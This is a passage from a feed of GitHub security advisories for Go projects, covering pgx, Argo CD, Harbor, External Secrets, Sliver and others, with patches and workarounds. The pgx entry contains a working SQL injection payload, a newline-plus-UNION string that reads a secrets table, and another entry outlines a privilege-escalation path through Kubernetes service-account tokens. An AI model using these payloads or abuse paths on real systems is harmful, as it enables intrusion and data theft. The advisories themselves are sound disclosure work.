<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Line Comment Creation</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur when all of the following conditions are met:</p>
<ol>
<li>The non-default simple protocol is used.</li>
<li>A placeholder for a numeric value must be immediately preceded by a minus.</li>
<li>There must be a second placeholder for a string value after the first placeholder; both
must be on the same line.</li>
<li>Both parameter values must be user-controlled.</li>
</ol>
<p>e.g. </p>
<p>Simple mode must be enabled:</p>
<pre><code class="language-go">// connection string includes "prefer_simple_protocol=true"
// or
// directly enabled in code
config.ConnConfig.PreferSimpleProtocol = true
</code></pre>
<p>Parameterized query:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=-$1 OR name=$2;
</code></pre>
<p>Parameter values:</p>
<p><code>$1</code> =&gt; <code>-42</code>
<code>$2</code> =&gt; <code>"foo\n 1 AND 1=0 UNION SELECT * FROM secrets; --"</code></p>
<p>Resulting query after preparation:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=--42 OR name= 'foo
1 AND 1=0 UNION SELECT * FROM secrets; --';
</code></pre>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Do not use the simple protocol or do not place a minus directly before a placeholder.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/argoproj/argo-cd/v2] Argo CD leaks repository credentials in user-facing error messages and in logs</title>
<description><h3 id="impact">Impact</h3>
<p>All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefor the UI or CLI). The user must have <code>applications, create</code> or <code>applications, update</code> RBAC access to reach the code which may produce the error.</p>
<p>The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. </p>
<p>If the user has <code>repositories, update</code> access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway.</p>
<h3 id="patches">Patches</h3>
<p>A patch for this vulnerability has been released in the following Argo CD version:</p>
<ul>
<li>v2.6.1</li>
</ul>
<h3 id="workarounds">Workarounds</h3>
<p>The only way to completely resolve the issue is to upgrade.</p>
<h4 id="mitigations">Mitigations</h4>
<p>To mitigate the issue, make sure that your repo credentials have only least necessary privileges. For example, the credentials should not have push access, and they should not have access to more resources than what Argo CD actually needs (for example, a whole GitHub org when only one repo is needed).</p>
<p>To further mitigate the impact of a leaked write-capable repo credential, you could <a href="https://argo-cd.readthedocs.io/en/stable/user-guide/gpg-verification/#enforcing-signature-verification">enable commit signature verification</a>. Even if someone could push a malicious commit, the commit would not by synced.</p>
<p>You should also enforce least privileges in Argo CD RBAC. Make sure users only have <code>repositories, update</code>, <code>applications, update</code>, or <code>applications, create</code> access if they absolutely need it.</p>
<h3 id="references">References</h3>
<ul>
<li>The problem was initially reported in a <a href="https://github.com/argoproj/argo-cd/issues/12309">GitHub issue</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/">Argo CD RBAC configuration documentation</a></li>
</ul>
<h3 id="for-more-information">For more information</h3>
<ul>
<li>Open an issue in <a href="https://github.com/argoproj/argo-cd/issues">the Argo CD issue tracker</a> or <a href="https://github.com/argoproj/argo-cd/discussions">discussions</a></li>
<li>Join us on <a href="https://argoproj.github.io/community/join-slack">Slack</a> in channel #argo-cd</li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-25163">https://nvd.nist.gov/vuln/detail/CVE-2023-25163</a></li>
<li><a href="https://github.com/argoproj/argo-cd/issues/12309">https://github.com/argoproj/argo-cd/issues/12309</a></li>
<li><a href="https://github.com/argoproj/argo-cd/pull/12320">https://github.com/argoproj/argo-cd/pull/12320</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1548">https://pkg.go.dev/vuln/GO-2023-1548</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac">https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac</a></li>
<li><a href="https://github.com/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gouniverse/cms] Gouniverse GoLang CMS vulnerable to Cross-site Scripting</title>
<description><p>A vulnerability was found in Gouniverse GoLang CMS 1.4.0. It has been declared as problematic. This vulnerability affects the function PageRenderHtmlByAlias of the file FrontendHandler.go. The manipulation of the argument alias leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.1 is able to address this issue. The patch is identified as 3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8572">https://nvd.nist.gov/vuln/detail/CVE-2024-8572</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5">https://github.com/gouniverse/cms/issues/5</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731">https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731</a></li>
<li><a href="https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c">https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c</a></li>
<li><a href="https://github.com/gouniverse/cms/releases/tag/v1.4.1">https://github.com/gouniverse/cms/releases/tag/v1.4.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276802">https://vuldb.com/?ctiid.276802</a></li>
<li><a href="https://vuldb.com/?id.276802">https://vuldb.com/?id.276802</a></li>
<li><a href="https://vuldb.com/?submit.401896">https://vuldb.com/?submit.401896</a></li>
<li><a href="https://github.com/advisories/GHSA-pv7h-hg6m-82j8">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pv7h-hg6m-82j8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/external-secrets/external-secrets] External Secrets Operator vulnerable to privilege escalation</title>
<description><h3 id="details">Details</h3>
<p>The external-secrets has a deployment called default-external-secrets-cert-controller, which is bound with a same-name ClusterRole. This ClusterRole has "get/list" verbs of secrets resources(<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a>). It also has path/update verb of validatingwebhookconfigurations resources(<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a>). As a result, if a malicious user can access the worker node which has this deployment. he/she can:</p>
<ol>
<li><p>For the "get/list secrets" permission, he/she can abuse the SA token of this deployment to retrieve or get ALL secrets in the whole cluster, including the cluster-admin secret if created. After that, he/she can abuse the cluster-admin secret to do whatever he/she likes to the whole cluster, resulting in a cluster-level privilege escalation.</p>
</li>
<li><p>For the patch/update verb of validatingwebhookconfigurations, the malicious user can abuse these permissions to get sensitive data or lanuch DoS attacks:</p>
</li>
</ol>
<p>For the privilege escalation attack, by updating/patching a Webhook to make it listen to Secret update operations, the attacker can capture and log all data from requests attempting to update Secrets. More specifically, when a Secret is updated, this Webhook sends the request data to the logging-service, which can then log the content of the Secret. This way, an attacker could indirectly gain access to the full contents of the Secret.</p>
<p>For the DoS attack, by updating/patching a Webhook, and making it deny all Pod create and update requests, the attacker can prevent any new Pods from being created or existing Pods from being updated, resulting in a Denial of Service (DoS) attack.</p>
<h3 id="poc">PoC</h3>
<p>Please see the "Details" section</p>
<h3 id="impact">Impact</h3>
<p>Privilege escalation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45041">https://nvd.nist.gov/vuln/detail/CVE-2024-45041</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35">https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c">https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a></li>
<li><a href="https://github.com/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qwgc-rr35-h4x9</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/bishopfox/sliver] Silver vulnerable to MitM attack against implants due to a cryptography vulnerability</title>
<description><h3 id="summary">Summary</h3>
<p>The current cryptography implementation in Sliver up to version 1.5.39 allows a MitM with access to the corresponding implant binary to execute arbitrary codes on implanted devices via intercepted and crafted responses. (Reserved CVE ID: CVE-2023-34758)</p>
<h3 id="details">Details</h3>
<p>Please see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.</p>
<h3 id="poc">PoC</h3>
<p>Please also see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.
To setup a simple PoC environment, </p>
<ol>
<li>Generate an implant with its C2 set to the PoC server's address and copy the embedded private implant key and public server key into the config json. </li>
<li>Run the implant on a separate VM and a <code>notepad.exe</code> window should pop up on the implanted VM.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>A successful attack grants the attacker permission to execute arbitrary code on the implanted device. </p>
<h3 id="references">References</h3>
<p><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a><br><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a><br><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a> </p>
<h3 id="credits">Credits</h3>
<p><a href="https://github.com/tangent65536">Ting-Wei Hsieh</a> from <a href="https://www.chtsecurity.com/?lang=en">CHT Security Co. Ltd.</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q</a></li>
<li><a href="https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516">https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/releases/tag/v1.5.40">https://github.com/BishopFox/sliver/releases/tag/v1.5.40</a></li>
<li><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-35170">https://nvd.nist.gov/vuln/detail/CVE-2023-35170</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34758">https://nvd.nist.gov/vuln/detail/CVE-2023-34758</a></li>
<li><a href="https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091">https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1866">https://pkg.go.dev/vuln/GO-2023-1866</a></li>
<li><a href="https://github.com/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8jxm-xp43-qh3q</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/osrg/gobgp/v3] Buffer Overflow vulnerability in osrg gobgp</title>
<description><p>Buffer Overflow vulnerability in osrg gobgp commit 419c50dfac578daa4d11256904d0dc182f1a9b22 allows a remote attacker to cause a denial of service via the handlingError function in pkg/server/fsm.go.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46565">https://nvd.nist.gov/vuln/detail/CVE-2023-46565</a></li>
<li><a href="https://github.com/osrg/gobgp/issues/2725">https://github.com/osrg/gobgp/issues/2725</a></li>
<li><a href="https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22">https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22</a></li>
<li><a href="https://github.com/advisories/GHSA-6rqv-5cg7-m4x3">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gitpod-io/gitpod] github.com/gitpod-io/gitpod vulnerable to Cookie Tossing</title>
<description><p>Versions of the package github.com/gitpod-io/gitpod/components/server/go/pkg/lib before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/components/ws-proxy/pkg/proxy before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/auth before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/public-api-server before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/server before main-gha.27122; versions of the package @gitpod/gitpod-protocol before 0.1.5-main-gha.27122 are vulnerable to Cookie Tossing due to a missing __Host- prefix on the <em>gitpod_io_jwt2</em> session cookie. This allows an adversary who controls a subdomain to set the value of the cookie on the Gitpod control plane, which can be assigned to an attacker’s own JWT so that specific actions taken by the victim (such as connecting a new Github organization) are actioned by the attackers session.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21583">https://nvd.nist.gov/vuln/detail/CVE-2024-21583</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/pull/19973">https://github.com/gitpod-io/gitpod/pull/19973</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155">https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155</a></li>
<li><a href="https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d">https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079">https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-2997">https://pkg.go.dev/vuln/GO-2024-2997</a></li>
<li><a href="https://github.com/advisories/GHSA-8pgc-65mj-53h5">https://github.com/advisories/GHSA-8pgc-65mj-53h5</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8pgc-65mj-53h5</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8pgc-65mj-53h5</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/windmill-labs/windmill] Windmill HTTP Request users.rs excessive authentication in github.com/windmill-labs/windmill</title>
<description><p>A vulnerability was found in Windmill 1.380.0. It has been classified as problematic. Affected is an unknown function of the file backend/windmill-api/src/users.rs of the component HTTP Request Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.390.1 is able to address this issue. The patch is identified as acfe7786152f036f2476f93ab5536571514fa9e3. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8462">https://nvd.nist.gov/vuln/detail/CVE-2024-8462</a></li>
<li><a href="https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3">https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3</a></li>
<li><a href="https://github.com/windmill-labs/windmill/releases/tag/v1.390.1">https://github.com/windmill-labs/windmill/releases/tag/v1.390.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276630">https://vuldb.com/?ctiid.276630</a></li>
<li><a href="https://vuldb.com/?id.276630">https://vuldb.com/?id.276630</a></li>
<li><a href="https://vuldb.com/?submit.401826">https://vuldb.com/?submit.401826</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-3118">https://pkg.go.dev/vuln/GO-2024-3118</a></li>
<li><a href="https://github.com/advisories/GHSA-g6q4-w3j3-jfc4">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] Cross-site Request Forgery (CSRF) in Cloud Native Computing Foundation Harbor</title>
<description><p>Cure53 has discovered that the Harbor web interface does not implement protection mechanisms against Cross-Site Request Forgery (CSRF). By luring an authenticated user onto a prepared third-party website, an attacker can execute any action on the platform in the context of the currently authenticated victim.</p>
<p>The vulnerability was immediately fixed by the Harbor team and all supported versions were patched.</p>
<p>Successful exploitation of this issue will lead to 3rd parties executing actions on the platform of behalf of authenticated users and administrators.</p>
<p>If your product uses the affected releases of Harbor, update to version 1.8.6 and 1.9.3 to patch this issue immediately.</p>
<p><a href="https://github.com/goharbor/harbor/releases/tag/v1.8.6">https://github.com/goharbor/harbor/releases/tag/v1.8.6</a>
<a href="https://github.com/goharbor/harbor/releases/tag/v1.9.3">https://github.com/goharbor/harbor/releases/tag/v1.9.3</a></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6">https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19025">https://nvd.nist.gov/vuln/detail/CVE-2019-19025</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19025">https://tanzu.vmware.com/security/cve-2019-19025</a></li>
<li><a href="https://github.com/advisories/GHSA-rffr-c932-cpxv">https://github.com/advisories/GHSA-rffr-c932-cpxv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rffr-c932-cpxv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rffr-c932-cpxv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] Cross-site Request Forgery (CSRF) in Cloud Native Computing Foundation Harbor</title>
<description><p>Cure53 has discovered that the Harbor web interface does not implement protection mechanisms against Cross-Site Request Forgery (CSRF). By luring an authenticated user onto a prepared third-party website, an attacker can execute any action on the platform in the context of the currently authenticated victim.</p>
<p>The vulnerability was immediately fixed by the Harbor team and all supported versions were patched.</p>
<p>Successful exploitation of this issue will lead to 3rd parties executing actions on the platform of behalf of authenticated users and administrators.</p>
<p>If your product uses the affected releases of Harbor, update to version 1.8.6 and 1.9.3 to patch this issue immediately.</p>
<p><a href="https://github.com/goharbor/harbor/releases/tag/v1.8.6">https://github.com/goharbor/harbor/releases/tag/v1.8.6</a>
<a href="https://github.com/goharbor/harbor/releases/tag/v1.9.3">https://github.com/goharbor/harbor/releases/tag/v1.9.3</a></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6">https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19025">https://nvd.nist.gov/vuln/detail/CVE-2019-19025</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19025">https://tanzu.vmware.com/security/cve-2019-19025</a></li>
<li><a href="https://github.com/advisories/GHSA-rffr-c932-cpxv">https://github.com/advisories/GHSA-rffr-c932-cpxv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rffr-c932-cpxv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rffr-c932-cpxv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] SQL Injection in Cloud Native Computing Foundation Harbor</title>
<description><p>Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w">https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19029">https://nvd.nist.gov/vuln/detail/CVE-2019-19029</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19029">https://tanzu.vmware.com/security/cve-2019-19029</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2022-0853">https://pkg.go.dev/vuln/GO-2022-0853</a></li>
<li><a href="https://github.com/advisories/GHSA-jr34-mff8-pc6f">https://github.com/advisories/GHSA-jr34-mff8-pc6f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jr34-mff8-pc6f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jr34-mff8-pc6f</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] SQL Injection in Cloud Native Computing Foundation Harbor</title>
<description><p>Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w">https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19029">https://nvd.nist.gov/vuln/detail/CVE-2019-19029</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19029">https://tanzu.vmware.com/security/cve-2019-19029</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2022-0853">https://pkg.go.dev/vuln/GO-2022-0853</a></li>
<li><a href="https://github.com/advisories/GHSA-jr34-mff8-pc6f">https://github.com/advisories/GHSA-jr34-mff8-pc6f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jr34-mff8-pc6f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jr34-mff8-pc6f</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v4] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
